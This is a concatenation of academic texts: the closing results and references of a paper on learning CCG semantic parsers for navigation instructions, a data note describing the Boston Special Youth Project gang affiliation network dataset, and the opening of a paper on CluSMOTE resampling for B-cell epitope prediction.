weaker supervision. Inter- estingly, these increases were achieved with a rel- atively simple executor, while previous work used MARCO (MacMahon et al., 2006), which supports sophisticated recovery strategies. Finally, we evaluate our approach on the held out test set for the oracle corpus (Table 4). In contrast to experiments on the Chen and Mooney (2011) cor- pus, we use a held out set for evaluation. Due to this discrepancy, all development was done on the train- ing set only. The increase in accuracy over learning with the original corpus demonstrates the significant impact of noise on our performance. In addition to 6This additional training data isn’t publicly available. Validation Single Sentence Sequence LF Final state 77.6 (1.14) 54.63 (3.5) 44 (6.12) Trace 78.63 (0.84) 58.05 (3.12) 51.05 (1.14) Table 4: Oracle corpus test accuracy and standard deviation results. execution results, we also report exact match logi- cal form (LF) accuracy results. For this purpose, we annotated 18 instruction sequences (105 sentences) with logical forms. The gap between execution and LF accuracy can be attributed to the complexity of the linguistic representation and redundancy in in- structions. These results provide a new baseline for studying learning from cleaner supervision. 11 Discussion We showed how to do grounded learning of a CCG semantic parser that includes a joint model of mean- ing and context for executing natural language in- structions. The joint nature allows situated cues to directly influence parsing and also enables algo- rithms that learn while executing instructions. This style of algorithm, especially when using the weaker end state validation, is closely related to re- inforcement learning approaches (Branavan et al., 2009, 2010). However, we differ on optimization and objective function, where we aim for minimal loss. We expect many RL techniques to be useful to scale to more complex environments, including sampling actions and using an exploration strategy. We also designed a semantic representation to closely match the linguistic structure of instructional language, combining ideas from many semantic theories, including, for example, Neo-Davidsonian events (Parsons, 1990). This approach allowed us to learn a compact and executable grammar that gen- eralized well. We expect, in future work, that such modeling can be reused for more general language. Acknowledgments The research was supported in part by DARPA un- der the DEFT program through the AFRL (FA8750- 13-2-0019) and the CSSG (N11AP20020), the ARO (W911NF-12-1-0197), and the NSF (IIS-1115966). The authors thank Tom Kwiatkowski, Nicholas FitzGerald and Alan Ritter for helpful discussions, David Chen for providing the evaluation corpus, and the anonymous reviewers for helpful comments. 59 References Artzi, Y., & Zettlemoyer, L. (2011). Bootstrapping Se- mantic Parsers from Conversations. In Proceed- ings of the Conference on Empirical Methods in Natural Language Processing. Barwise, J., & Cooper, R. (1981). Generalized Quanti- fiers and Natural Language. Linguistics and Phi- losophy, 4(2), 159–219. Branavan, S., Chen, H., Zettlemoyer, L., & Barzilay, R. (2009). Reinforcement learning for mapping in- structions to actions. In Proceedings of the Joint Conference of the Association for Computational Linguistics and the International Joint Conference on Natural Language Processing. Branavan, S., Zettlemoyer, L., & Barzilay, R. (2010). Reading between the lines: learning to map high- level instructions to commands. In Proceedings of the Conference of the Association for Computa- tional Linguistics. Bugmann, G., Klein, E., Lauria, S., & Kyriacou, T. (2004). Corpus-based robotics: A route instruc- tion example. In Proceedings of Intelligent Au- tonomous Systems. Carpenter, B. (1997). Type-Logical Semantics. The MIT Press. Chen, D. L. (2012). Fast Online Lexicon Learning for Grounded Language Acquisition. In Proceedings of the Annual Meeting of the Association for Com- putational Linguistics. Chen, D., Kim, J., & Mooney, R. (2010). Training a mul- tilingual sportscaster: using perceptual context to learn language. Journal of Artificial Intelligence Research, 37(1), 397–436. Chen, D., & Mooney, R. (2011). Learning to Interpret Natural Language Navigation Instructions from Observations. In Proceedings of the National Con- ference on Artificial Intelligence. Clark, S., & Curran, J. (2007). Wide-coverage efficient statistical parsing with CCG and log-linear mod- els. Computational Linguistics, 33(4), 493–552. Clarke, J., Goldwasser, D., Chang, M., & Roth, D. (2010). Driving Semantic Parsing from the World’s Response. In Proceedings of the Confer- ence on Computational Natural Language Learn- ing. Collins, M. (2004). Parameter estimation for statis- tical parsing models: Theory and practice of distribution-free methods. In New Developments in Parsing Technology. Davidson, D. (1967). The logical form of action sen- tences. Essays on actions and events, 105–148. Di Eugenio, B., & White, M. (1992). On the Interpre- tation of Natural Language Instructions. In Pro- ceedings of the Conference of the Association of Computational Linguistics. Dzifcak, J., Scheutz, M., Baral, C., & Schermerhorn, P. (2009). What to Do and How to Do It: Trans- lating Natural Language Directives Into Temporal and Dynamic Logic Representation for Goal Man- agement and Action Execution. In Proceedings of the IEEE International Conference on Robotics and Automation. Goldwasser, D., Reichart, R., Clarke, J., & Roth, D. (2011). Confidence Driven Unsupervised Seman- tic Parsing. In Proceedings of the Association of Computational Linguistics. Goldwasser, D., & Roth, D. (2011). Learning from Nat- ural Instructions. In Proceedings of the Interna- tional Joint Conference on Artificial Intelligence. Heim, I., & Kratzer, A. (1998). Semantics in Generative Grammar. Blackwell Oxford. Kate, R., & Mooney, R. (2006). Using String-Kernels for Learning Semantic Parsers. In Proceedings of the Conference of the Association for Computational Linguistics. Kim, J., & Mooney, R. J. (2012). Unsupervised PCFG Induction for Grounded Language Learning with Highly Ambiguous Supervision. In Proceedings of the Conference on Empirical Methods in Natu- ral Language Processing. Kollar, T., Tellex, S., Roy, D., & Roy, N. (2010). Toward Understanding Natural Language Directions. In Proceedings of the ACM/IEEE International Con- ference on Human-Robot Interaction. Krishnamurthy, J., & Mitchell, T. (2012). Weakly Super- vised Training of Semantic Parsers. In Proceed- ings of the Joint Conference on Empirical Meth- ods in Natural Language Processing and Compu- tational Natural Language Learning. Kwiatkowski, T., Goldwater, S., Zettlemoyer, L., & Steedman, M. (2012). A probabilistic model of syntactic and semantic acquisition from child- directed utterances and their meanings. Proceed- ings of the Conference of the European Chapter of the Association of Computational Linguistics. Kwiatkowski, T., Zettlemoyer, L., Goldwater, S., & Steedman, M. (2010). Inducing probabilistic CCG grammars from logical form with higher-order 60 unification. In Proceedings of the Conference on Empirical Methods in Natural Language Process- ing. Kwiatkowski, T., Zettlemoyer, L., Goldwater, S., & Steedman, M. (2011). Lexical Generalization in CCG Grammar Induction for Semantic Parsing. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Lafferty, J., McCallum, A., & Pereira, F. (2001). Con- ditional Random Fields: Probabilistic Models for Segmenting and Labeling Sequence Data. In Pro- ceedings of the International Conference on Ma- chine Learning. Lewis, D. (1970). General Semantics. Synthese, 22(1), 18–67. Liang, P., Jordan, M., & Klein, D. (2009). Learning se- mantic correspondences with less supervision. In Proceedings of the Joint Conference of the Asso- ciation for Computational Linguistics the Interna- tional Joint Conference on Natural Language Pro- cessing. Liang, P., Jordan, M., & Klein, D. (2011). Learning Dependency-Based Compositional Semantics. In Proceedings of the Conference of the Association for Computational Linguistics. MacMahon, M. (2007). Following Natural Language Route Instructions. Ph.D. thesis, University of Texas at Austin. MacMahon, M., Stankiewics, B., & Kuipers, B. (2006). Walk the Talk: Connecting Language, Knowl- edge, Action in Route Instructions. In Proceed- ings of the National Conference on Artificial Intel- ligence. Matuszek, C., FitzGerald, N., Zettlemoyer, L., Bo, L., & Fox, D. (2012). A Joint Model of Language and Perception for Grounded Attribute Learning. Pro- ceedings of the International Conference on Ma- chine Learning. Matuszek, C., Fox, D., & Koscher, K. (2010). Follow- ing directions using statistical machine translation. In Proceedings of the international conference on Human-robot interaction. Matuszek, C., Herbst, E., Zettlemoyer, L. S., & Fox, D. (2012). Learning to Parse Natural Language Com- mands to a Robot Control System. In Proceedings of the International Symposium on Experimental Robotics. Montague, R. (1973). The Proper Treatment of Quantifi- cation in Ordinary English. Approaches to natural language, 49, 221–242. Muresan, S. (2011). Learning for Deep Language Under- standing. In Proceedings of the International Joint Conference on Artificial Intelligence. Parsons, T. (1990). Events in the Semantics of English. The MIT Press. Singh-Miller, N., & Collins, M. (2007). Trigger-based language modeling using a loss-sensitive percep- tron algorithm. In IEEE International Conference on Acoustics, Speech and Signal Processing. Steedman, M. (1996). Surface Structure and Interpreta- tion. The MIT Press. Steedman, M. (2000). The Syntactic Process. The MIT Press. Steedman, M. (2011). Taking Scope. The MIT Press. Taskar, B., Guestrin, C., & Koller, D. (2003). Max- Margin Markov Networks. In Proceedings of the Conference on Neural Information Processing Systems. Taskar, B., Klein, D., Collins, M., Koller, D., & Manning, C. (2004). Max-Margin Parsing. In Proceedings of the Conference on Empirical Methods in Natural Language Processing. Tellex, S., Kollar, T., Dickerson, S., Walter, M., Banerjee, A., Teller, S., & Roy, N. (2011). Understanding Natural Language Commands for Robotic Naviga- tion and Mobile Manipulation. In Proceedings of the National Conference on Artificial Intelligence. Vogel, A., & Jurafsky, D. (2010). Learning to follow nav- igational directions. In Proceedings of the Con- ference of the Association for Computational Lin- guistics. Webber, B., Badler, N., Di Eugenio, B., Geib, C., Lev- ison, L., & Moore, M. (1995). Instructions, In- tentions and Expectations. Artificial Intelligence, 73(1), 253–269. Wei, Y., Brunskill, E., Kollar, T., & Roy, N. (2009). Where To Go: Interpreting Natural Directions Using Global Inference. In Proceedings of the IEEE International Conference on Robotics and Automation. Winograd, T. (1972). Understanding Natural Language. Cognitive Psychology, 3(1), 1–191. Wong, Y., & Mooney, R. (2007). Learning Synchronous Grammars for Semantic Parsing with Lambda Cal- culus. In Proceedings of the Conference of the As- sociation for Computational Linguistics. 61 Zettlemoyer, L., & Collins, M. (2005). Learning to map sentences to logical form: Structured classification with probabilistic categorial grammars. In Pro- ceedings of the Conference on Uncertainty in Ar- tificial Intelligence. Zettlemoyer, L., & Collins, M. (2007). Online learning of relaxed CCG grammars for parsing to logical form. In Proceedings of the Joint Conference on Empirical Methods in Natural Language Process- ing and Computational Natural Language Learn- ing. 62 work_hn7ddwy34rcplg53wrpdqgqroy ---- Microsoft Word - Volume37_final insna.org | Issues 1&2 | Volume 37 | 85 The Boston Special Youth Project Affiliation Dataset Jacob T.N. Young Arizona State University Scott H. Decker Arizona State University Gary Sweeten Arizona State University Abstract The Boston Special Youth Project (SYP) Affiliation dataset is a large, bipartite network rep- resenting interactions among 166 gang members from seven gangs for nearly three years. The project was conducted from June 1954 to May 1957 and represents one of the most elaborate gang intervention programs ever conducted. The SYP was a “detached-worker program,” where an adult (typically a graduate student from one of the surrounding universities) was as- signed to an area (local parks, housing projects) to establish and maintain contact with and at- tempt to change the behaviors of the gangs. These workers collected detailed field notes (“contact cards”) documenting the activities of study gang members. However, the social network data collected on the contact cards were never analyzed by SYP staff. After the death of the project leader, Walter Miller, in 2004, the materials from the project became available to a team of researchers (faculty, graduate, and undergraduate students) in the School of Criminology and Criminal Justice at Arizona State University. These researchers electronical- ly scanned and digitized the contact cards, and began the process of creating a network from the cards. From these cards, a bipartite network was created where 166 individuals (i.e. gang members) were connected to 33,653 events (i.e. contact cards). Authors Jacob T.N. Young, Associate Professor at the School of Criminology and Criminal Justice and Associate Director of the Center for Correctional Solutions, Arizona State University. Scott H. Decker, Foundation Professor and Director of the Center for Public Criminology at the School of Criminology and Criminal Justice, Arizona State University. Gary Sweeten, Associate Professor at the School of Criminology and Criminal Justice, Arizona State University. Direct all correspondence to Jacob Young (email: Jacob.Young.1@asu.edu, phone: 602-496- 1343, fax: 602-496-0045). School of Criminology and Criminal Justice, MC 4420, 411 N. Central Ave., Suite 600, Phoenix, AZ 85004-0685. Connections Affiliation Dataset 86 | Volume 37 | Issues 1&2 | insna.org 1. Overview The Boston Special Youth Project (SYP) was a federally funded study of a gang in- tervention program (National Institute of Mental Health) occurring between 1953 and 1958. Conducted in and around the neighborhoods of Roxbury, MA, the study was one of the first large-scale evaluations of a detached-worker program, and the first designed to specifically address gang delinquency (Miller, 2011; Moule, 2015). Spurred by the high-profile murder of a rabbi in 1952 (Miller, 1957), the SYP was implemented to restructure the activities of adolescent street gangs toward pro-social activities, provide social services to project families, and provide the community with the tools needed to control delinquency following the completion of the study (Miller, 1957, 1959, 1962). The study is best known as the basis for Miller's (1958a) elaboration of the focal concerns of lower class culture. The SYP was a “detached-worker program,” where an adult (typically a graduate student from one of the surround- ing universities) was assigned to an area (local parks, housing projects) to establish and maintain contact with, and attempt to change the behaviors of the gangs. For ex- ample, outreach workers provided mone- tary assistance, sports equipment, and clubhouses to the groups, and transported members to and from local sporting and social events. From June 1954 to May 1957, five male and two female outreach workers maintained contact with nearly 400 individuals between the ages of 12 and 21, across roughly two dozen gangs. Inten- sive contact with 204 individuals in seven groups was made during this period. These “intense study” groups were con- tacted by workers an average of 3.5 times per week for an average duration of 5.5 hours and the intervals of the contact peri- ods ranged from 10 to 34 months (Miller, 1962). During these contact periods, work- ers collected detailed field notes (“contact cards”) documenting the activities of study gang members and their interactions with each other, various community members (e.g., shop keepers, law enforcement), and the worker. Contact cards also documented hearsay or evidence of conflicts within gangs, or between gangs. There were a to- tal of over 78,000 contact cards, providing a rich and unique biography of each gang. Walter Miller passed away in 2004, with many of his professional papers and effects collected by a former graduate stu- dent, Hedy Bookin-Weiner. Dr. Bookin- Weiner contacted well-known gang re- searchers in the US about taking posses- sion of these effects. Scott Decker eventu- ally received the collection in 2006. In 2011, the typed chapters of Miller's (2011) previously unpublished book, City Gangs, and the roster of gang members from the SYP were discovered (Moule and Decker, 2013). These data sources were eventually combined with the information from the contact cards. These rosters and the contact cards serve as the source of social network data. From 2012 to 2016, a team of re- searchers (faculty, graduate, and under- graduate students) in the School of Crimi- nology and Criminal Justice at Arizona State University electronically scanned and digitized the contact cards, and began the process of creating a network from the cards as part of a federally funded grant (National Science Foundation Award #1228472; see Moule and Decker, 2013). Each card was examined to match named persons with names of known gang mem- bers from the roster of study participants. From these cards, a bipartite network was created where individuals (i.e. gang mem- bers) were connected to events (i.e. contact cards). 2. Data Collection Of all the cards, there were 79,671 physi- cal contact cards. The research team was only able to clean 69,403 of the cards dur- ing the project period. During cleaning, the team noticed that many cards were dupli- Affiliation Dataset Connections insna.org | Issues 1&2 | Volume 37 | 87 cates of events and represented retyped cards by the social workers. After remov- ing these duplicate cards and cards that were unreadable, there were 51,554 cards. Of these, 49,193 had valid dates that could be used to chronologically order the cards. From there, 33,653 cards had valid entries of names. That is, names of individuals from available rosters. These 33,653 cards contain 166 unique individuals from the seven gangs that constitute the “intensive study” groups. As shown in Table 1, the seven gangs studied vary in age, race, gender, and size. Several features of the gangs are important to note. First, there is considera- ble variation in the extent to which the full roster of gang members appear in the con- tact cards. This is because some members were involved in the crimi- nal justice system, while others would spend varying amounts of time with the group due to employment, dating, or schooling. For most of the gangs, the indi- viduals in the roster appear at least once. For the HF (Black, female) gang, there is very little representation of the roster and this largely reflects the lack of cards avail- able for this gang. The last column of Ta- ble 1 shows the percentage of the cards represented by each gang. As can be seen, there is also variation in the extent to which each gang constitutes the network. By far, the MM2, WM3, and WM2 (all White and male) are the most represented gangs in the network. In fact, these three gangs account for 88.8% of the cards in data, whereas the other four gangs (i.e. MM3, HM3, HF, and CF) account for the remaining 11.2%. Gang Code Gender Race Number on Roster Percentage of Roster Names (Number) Observed in Cards Observation Period Percentage of Cards (Number) Represented by each Gang MM3 Male White 33 93% (31) 6/21/54 - 1/30/56 8.7% (2,931) MM2 Male White 45 77% (44) 7/26/56 - 4/10/57 33.2% (11,122) WM3 Male White 37 97% (36) 2/1/55 - 5/11/57 22.3% (7,498) WM2 Male White 26 84% (22) 11/15/54 - 5/11/57 33.3% (11,174) HM3 Male Black 40 47% (19) 7/15/54 - 4/24/57 0.5% (171) HF Female Black 39 7% (3) 10/15/54 - 10/10/56 0.02% (8) CF Female White 11 100% (11) 10/22/54 - 4/25/57 4.7% a (1,583) Table 1: Characteristics of the Seven Gangs and Percentage of Contact Cards Represented by each Gang aColumn does not sum to 100% because there are 1,000 cards where multiple gangs appear on the card. These cards get double counted in the raw frequencies shown for each gang. Response Rate N/A Non-Respondent Bias N/A Theoretical Groupings The gangs/corner-groups are defined by geographic areas. Publications Using These Data None. Data Context A data component of a gang intervention conducted in Boston, MA. Respondents Gang/Corner-group members. Longitudinal Yes. Data were collected for variable intervals on each of the gangs. Temporality Low. Nothing about the data, collection, or cntext suggests the validity of the data will attenuate over time. Analytical or Pedagocical Utility Can be used to validate community detection approaches since the groups are known. Demonstrate properties of large, bipartite networks. Examining longitudinal, bipartite networks. Demonstrating consequences of projection to one-mode networks. Known Issues Variation in the extent to which data were collected for each of the gangs. The bulk of the network is constituted by three gangs. Connections Affiliation Dataset 88 | Volume 37 | Issues 1&2 | insna.org 3. Data Files and Formats The data are provided in one Excel Work- book, called BIPAR- TITE.GANGS.DATA.xlsx, containing three worksheets (tabs). Edgelist.Bipartite.Gangs. This is the edgelist for the undirected, unweighted bipartite network of ties from individuals to events. There are 60,234 edges and 33,653 vertices (166 gang members and 33,487 cards). The first column of the sheet is the individual gang member and the second column is the event (i.e. contact card). As the edges are undirected, each row represents an individual’s presence at an event as recorded by the social worker. The vertex IDs for the first mode (individ- uals) begin at 1 and end at 166. The vertex IDs for the second mode (events) begin at 167 and end at 33,653. Event.Date. This sheet provides the ID (first column) and the month and year (second column) for each of the 33,653 events. Rows 2–167 are the 166 individual gang members with the value “NA” for this attribute. The applicable values are a four-digit number indicating in the first two digits the year and the second two dig- its the month in which the card was rec- orded. For example, 5506 indicates that the card was recorded in month 06 (i.e. June) of year 55 (i.e. 1955). Actor.Attr. This sheet provides the ID (first column), the gang in which the individuals is a member (second column), a dummy variable indicating whether the individual is male or female (third column; 1 = male, 0 = female), and a dummy varia- ble indicating whether the individual is white or non-white (fourth column; 1 = white, 0 = non-white). These attributes are provided for each of the 166 individuals. Values of “NA” are listed for events. References Miller, W. B. (1957). The impact of a community group work program on delinquent corner groups. Social Service Review, 31, 390-406. Miller, W. B. (1958a). Lower class culture as a gener- ating milieu of gang delinquency. Journal of So- cial Issues, 14, 5-19. Miller, W. B. (1959). Preventative work with street- corner groups: Boston delinquency project. Annals of the American Academy of Political Science, 322, 97–106. Miller, W. B. (1962). The impact of a ‘total- community’ delinquency control project. Social Problems, 10, 168–191. Miller, W. B. (2011). City gangs. Retrieved from https://ccj.asu.edu/gangresearch. Moule, Jr., R. K. (2015). The legacy of Walter B. Mil- ler. In S. H. Decker and D. C. Pyrooz (Eds.). The Handbook of Gangs (pp. 458-477). New York, NY: Wiley-Blackwell. Moule Jr., R. K., and Decker, S. H. (2013). “Hidden in plain sight”: Locating the men and women of the 1954 Boston Special Youth Program. Journal of Qualitative Criminal Justice and Criminology 1, 267-291. work_ho2ac3l4ivbnbkr2yq3m3ik4re ---- Submitted 12 May 2019 Accepted 15 April 2020 Published 1 June 2020 Corresponding author Binti Solihah, binti.solihah@mail.ugm.ac.id Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.275 Copyright 2020 Solihah et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Enhancement of conformational B-cell epitope prediction using CluSMOTE Binti Solihah1,2, Azhari Azhari1 and Aina Musdholifah1 1 Department of Computer Science and Electronics, Faculty of Mathematics and Natural Sciences, Universitas Gadjah Mada, Yogyakarta, Indonesia 2 Department of Informatics Engineering, Universitas Trisakti, Grogol, Jakarta Barat, Indonesia ABSTRACT Background. A conformational B-cell epitope is one of the main components of vaccine design. It contains separate segments in its sequence, which are spatially close in the antigen chain. The availability of Ag-Ab complex data on the Protein Data Bank allows for the development predictive methods. Several epitope prediction models also have been developed, including learning-based methods. However, the performance of the model is still not optimum. The main problem in learning-based prediction models is class imbalance. Methods. This study proposes CluSMOTE, which is a combination of a cluster- based undersampling method and Synthetic Minority Oversampling Technique. The approach is used to generate other sample data to ensure that the dataset of the conformational epitope is balanced. The Hierarchical DBSCAN algorithm is performed to identify the cluster in the majority class. Some of the randomly selected data is taken from each cluster, considering the oversampling degree, and combined with the minority class data. The balance data is utilized as the training dataset to develop a conformational epitope prediction. Furthermore, two binary classification methods, Support Vector Machine and Decision Tree, are separately used to develop model prediction and to evaluate the performance of CluSMOTE in predicting conformational B-cell epitope. The experiment is focused on determining the best parameter for optimal CluSMOTE. Two independent datasets are used to compare the proposed prediction model with state of the art methods. The first and the second datasets represent the general protein and the glycoprotein antigens respectively. Result. The experimental result shows that CluSMOTE Decision Tree outperformed the Support Vector Machine in terms of AUC and Gmean as performance measurements. The mean AUC of CluSMOTE Decision Tree in the Kringelum and the SEPPA 3 test sets are 0.83 and 0.766, respectively. This shows that CluSMOTE Decision Tree is better than other methods in the general protein antigen, though comparable with SEPPA 3 in the glycoprotein antigen. Subjects Bioinformatics, Data Mining and Machine Learning Keywords Cluster-based undersampling, SMOTE, Class imbalance, Hybrid sampling, Hierarchi- cal DBSCAN, Vaccine design INTRODUCTION A B-cell epitope is among the main components of peptide-based vaccines (Andersen, Nielsen & Lund, 2006; Zhang et al., 2011; Ren et al., 2015). It can be utilized in How to cite this article Solihah B, Azhari A, Musdholifah A. 2020. Enhancement of conformational B-cell epitope prediction using CluS- MOTE. PeerJ Comput. Sci. 6:e275 http://doi.org/10.7717/peerj-cs.275 https://peerj.com/computer-science mailto:binti.solihah@mail.ugm.ac.id https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.275 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.275 immunodetection or immunotherapy to induce an immune response (Rubinstein et al., 2008). Many B-cell epitopes are conformational and originate from separate segments of an antigen sequence, forming a spatial neighborhood in the antigen-antibody (Ag–Ab) complex. Identifying epitopes through experiments is tedious and expensive work, and therefore, there is a high risk of failure. Current progress in bioinformatics makes it possible to create vaccine designs through 3D visualization of protein antigen. Many characteristics, including composition, cooperativeness, hydrophobicity, and secondary structure, are considered in identifying potential substances for an epitope (Kringelum et al., 2013). Since no dominant characteristic helps experts to easily distinguish epitopes from other parts of the antigen, the risk of failure is quite high. The availability of the 3D structure of the Ag–Ab complex in the public domain and computational resources eases the development of predictive models using various methods, including the structure and sequence-based approaches. However, the conformational epitope prediction is still challenging. The structure-based approach can be divided into three, including dominant-characteristic-based, graph-based, and learning-based categories. There are several characteristic-based approaches, including (1) CEP, which uses solvent- accessibility properties, (2) Discotope using both solvent-accessibility-based properties and epitope log odds ratio of amino acid, (3) PEPITO that adds half-sphere exposure (HSE) to log odds ratio of amino acid in Discotope and (4) Discotope 2.0, which is an improved version of Discotope. It defines the log odd ratios in spatial contexts and adds half-sphere exposure (HSE) as a feature, and (5) SEPPA, which utilizes exposed and adjacent residual characteristics to form a triangle unit patch (Kulkarni-kale, Bhosle & Kolaskar, 2005; Andersen, Nielsen & Lund, 2006; Kringelum et al., 2012; Sun et al., 2009). The dominant-characteristic-based approach is limited by the number of features and the linear relationships between them. The graph-based method is yet another critical method, although only two from the same study were found during the literature review. Zhao et al. (2012) developed a subgraph that could represent the planar nature of the epitope. Although the model is designed to identify a single epitope, it can also detect multiples. Zhao et al. (2014) used features extracted from both antigens and the Ag–Ab interaction, which is expressed by a coupling graph and later transformed into a general graph. The learning-based approach utilizes machine-learning to work with a large number of features. It also uses nonlinear relationships between features to optimize model performance. Rubinstein, Mayrose & Pupko (2009) used two Naïve Bayesian classifiers to develop structure-based and sequence-based approaches. SEPPA 2.0 combines amino acid index (AAindex) characteristics in the SEPPA algorithm in the calculation of cluster coefficients (Qi et al., 2014; Kawashima et al., 2008). Aaindex in SEPPA 2.0 is consolidated via Artificial Neural Networks (ANN). However, SEPPA 3.0 adds the glycosylation triangles and glycosylation-related AAindex to SEPPA 2.0 (Zhou et al., 2019). Glycosylation-related AAindex is consolidated to SEPPA 3.0 via ANN. Several researchers utilized the advantages of random forest (Dalkas & Rooman, 2017; Jespersen et al., 2017; Ren et al., 2014; Zhang et al., 2011). The main challenge in developing a conformational B-cell epitope prediction Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 2/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275 model is the class imbalance problem. This is a condition where the sample of the target or epitope class is less than that of the nontarget or the non-epitope classes. Several methods have been proposed to handle the class imbalance problem. However, studies that focus on handling this issue in epitope prediction models are still limited. Ren et al. (2014) and Zhang et al. (2011) used simple random undersampling to handle the class imbalance problem. Dalkas & Rooman (2017) used the Support Vector Machine (SVM) Synthetic Minority Over-sampling Technique (SMOTE) method, which is a variant of SMOTE. Another common approach used is weighted SVM, which is included in the cost-sensitive algorithm level category (Ren et al., 2015). Additionally, Zhang et al. (2014) used a cost-sensitive ensemble approach and proved that the method was superior to Easy Ensemble, Balance Cascade and SMOTEBoost (Liu, Wu & Zhou, 2009; Chawla et al., 2003). Currently, several studies focus on class imbalance using various approaches that are mainly divided into four, including data and algorithm levels, cost-sensitive, and ensemble (Galar et al., 2012). In the data level approach, the resampling method is used to ensure a balanced distribution of data (Gary, 2012). The approaches under this category include undersampling, oversampling and a combination of both (Drummond & Holte, 2003; Estabrooks, Jo & Japcowick, 2004; Chawla et al., 2002; Chawla et al., 2008). In the algorithm level, the minority class is specifically considered. Most algorithms are equipped with a search system to identify rare patterns (Gary, 2012). The learning process of classifiers usually ignores the minority class. Specific recognition algorithms are used to detect rare patterns, providing different misclassification weights between minority and majority classes or different weights (Elkan, 2001; Batuwita & Palade, 2012; Japkowicz, Myers & Gluck, 1995; Raskutti & Kowalczyk, 2003). In general, adding cost to an instance is categorized as cost-sensitive in the data level (Galar et al., 2012). The approach is also applied in the ensemble method (Blaszczynski & Stefanowski, 2014). However, the determination of the weight is carried out through trial and error. The most common ensemble methods used to handle the class imbalance problem include bagging and boosting. In bagging, a balanced class sample is generated using the bootstrapping mechanism. The sampling methods used in this case include random undersampling and oversampling, as well as SMOTE (Blaszczynski & Stefanowski, 2014; Galar et al., 2012). In boosting, samples are selected iteratively and their weight calculated based on the misclassification costs. Many boosting variations have been proposed, though the most influential is the AdaBoost (Freund & Schapire, 1996). Random oversampling and undersampling are the simplest sampling methods used in balancing data distribution. Handling class imbalance in the preprocessing data is versatile since it does not depend on the classifier used. Similarly, the random oversampling method is versatile because it does not rely on the classifier used. However, its main drawback is overfitting because new sample data are not added. The SMOTE technique avoids overfitting by interpolating adjacent members of the minority class to create new sample data (Chawla et al., 2002). Furthermore, oversampling that considers certain conditions, such as the density distribution and the position of the sample point to the majority class, improves the performance of the classifier (He & Garcia, 2009; Han et al., 2005). Random Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 3/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275 undersampling is a concern in the sense that loss of information from the dataset might occur. This is because of pruning may considerably affect and reduce its performance. To reduce the loss of information, several cluster-based methods have been used in resampling (Yen & Lee, 2009; Das, Krishnan & Cook, 2013; Sowah et al., 2016; Tsai et al., 2019). Cluster-based undersampling can be conducted by omitting class labels (Yen & Lee, 2009; Das, Krishnan & Cook, 2013). Alternatively, it can be performed only on the negative class (Sowah et al., 2016; Lin et al., 2017; Tsai et al., 2019). Das, Krishnan & Cook (2013) discarded the negative class data that overlap the positive in a specific cluster based on the degree of overlapping. According to Yen & Lee (2009), the samples from the negative class are proportional to the ones in the positive class in a particular cluster. Also, Sowah et al. (2016) randomly selected several sample data from each cluster. In Tsai et al. (2019), the cluster members were selected using optimization algorithms. Clustering samples of the negative to positive class may lead to a suboptimal cluster number of data in the negative class (Lin et al., 2017). In this research, the cluster-based undersampling method is combined with SMOTE to obtain a balanced dataset. The parameter r is defined to determine the proportion of the majority class data sampled and compared with the minority. A classifier model is built with the decision tree (DT) and SVM algorithms to assess the performance of the proposed method. MATERIAL AND METHODS Dataset This research uses Rubinstein’s dataset as training (Rubinstein, Mayrose & Pupko, 2009). The formation criteria of the training dataset are explained by Rubinstein et al. (2008). The study shows the following, (1) The Ag–Ab complex structure should contain antibodies with both heavy and light chains, (2) Contact between antigens and antibodies must occur in the complementarity-determining regions, (3) The amount of antigen residues binds to antibodies is large, and (4) The complex used cannot be similar to other complexes, as stated in the Structural Classification of Proteins criteria (Murzin et al., 1995). The training dataset consists of 76 antigen chains derived from 62 3D structure Ag–Ab complexes. The chain list is shown in Table S1. The complexes are downloaded from the Protein Data Bank (PDB) (Berman et al., 2000). Two independent test sets are used, including Kringelum and SEPPA 3.0 (Kringelum et al., 2012; Chou et al., 2019). Kringelum’s test set consists of 39 antigen chains. Data were filtered from 52 antigen chains and thirteen antigens were excluded from the list because they were used as training data with the compared method. The data released include 1AFV, 1BGX, 1RVF, 2XTJ, 3FMG, 3G6J, 3GRW, 3H42, 3MJ9, 3RHW, 3RI5, 3RIA, and 3RIF. The details of Zhang’s test set are presented in Table S2A. The test set represents protein antigen in the general category. It is used to compare the CluSMOTE DT with the Discotope 1.2, Ellipro, Epitopia, EPCES, PEPITO and Discotope 2 (Andersen, Nielsen & Lund, 2006; Ponomarenko et al., 2008; Rubinstein, Mayrose & Pupko, 2009; Liang et al., 2009; Sweredoski & Baldi, 2008; Kringelum et al., 2012). The SEPPA 3.0 test set is a glycoprotein category Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 4/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275#supp-1 http://dx.doi.org/10.7717/peerj-cs.275#supp-1 http://dx.doi.org/10.7717/peerj-cs.275 test set. This dataset consists of 98 antigen chains and eight were excluded because they were multiple epitopes, including 5KEM A1, 5KEM A2, 5T3X G1, 5T3X G2, 5TLJ X1, 5TLJ X2, 5TLK X1, and 5TLK X2. The test set was used to compare the CluSMOTE DT with the SEPPA 2.0 SEPPA 3.0, PEPITO, Epitopia, Discotope 2, CBTOPE and BepiPred 2.0 methods (Qi et al., 2014; Ansari & Raghava, 2010; Jespersen et al., 2017). The antigen list for the test set is presented in Table S2B. Conformational B-cell epitope prediction method Conformational epitopes are residues of exposed antigens that are spatially close, though they form separate segments when viewed from sequences (Andersen, Nielsen & Lund, 2006). To build a conformational epitope prediction model, the steps needed, as shown in Fig. 1 are include (1) preparing the dataset, (2) balancing the dataset, and (3) creating a classification model for the prediction of residual potential epitopes. The preparation step aims to build the training and testing datasets. The number of exposed residues considered as epitopes is less than the exposed residues that are not-epitopes. Balancing the dataset is meant to overcome the class imbalance found in Step 1, while the classification model categorizes residues as members of the epitope or non-epitope class. Data preprocessing The creation of feature vectors and epitope annotations for the training and testing data is conducted on surface residues only. Relatively accessible surface area (RSA) is used as a parameter to 